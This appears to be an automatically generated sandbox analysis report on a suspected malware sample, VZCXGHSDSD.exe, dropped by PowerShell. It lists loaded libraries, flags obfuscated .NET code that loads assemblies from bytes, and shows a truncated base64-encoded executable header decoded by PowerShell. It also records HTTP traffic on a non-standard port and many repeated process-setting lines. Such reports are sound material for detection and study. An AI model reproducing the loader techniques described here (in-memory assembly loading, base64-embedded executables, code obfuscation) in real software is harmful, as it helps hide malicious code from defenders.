Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: QAWAS23232.pdb source: VZCXGHSDSD.exe, 00000002.00000000.1303782935.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, VZCXGHSDSD.exe.0.dr
Source: Binary string: QAWAS23232.pdbT source: VZCXGHSDSD.exe, 00000002.00000000.1303782935.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, VZCXGHSDSD.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: VZCXGHSDSD.exe.0.dr, -Module-.cs .Net Code: _206B_206B_206E_202C_200B_200F_200C_202D_206D_200C_206B_202B_202E_206C_200E_200F_206F_206F_202C_206A_206F_206B_206B_202A_206B_202C_206C_202A_200B_202B_202C_206E_200F_206E_200F_206B_206E_202B_206C_206B_202E System.Reflection.Assembly.Load(byte[])
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE
Binary contains a suspicious time stamp
Source: VZCXGHSDSD.exe.0.dr Static PE information: 0xAD2D5F4D [Wed Jan 25 16:24:45 2062 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0691F002 push es; ret 3_2_0691EFD0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0691EFA0 push es; ret 3_2_0691EFD0
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Code function: 3_2_0691EFC0 push es; ret 3_2_0691EFD0
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VZCXGHSDSD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
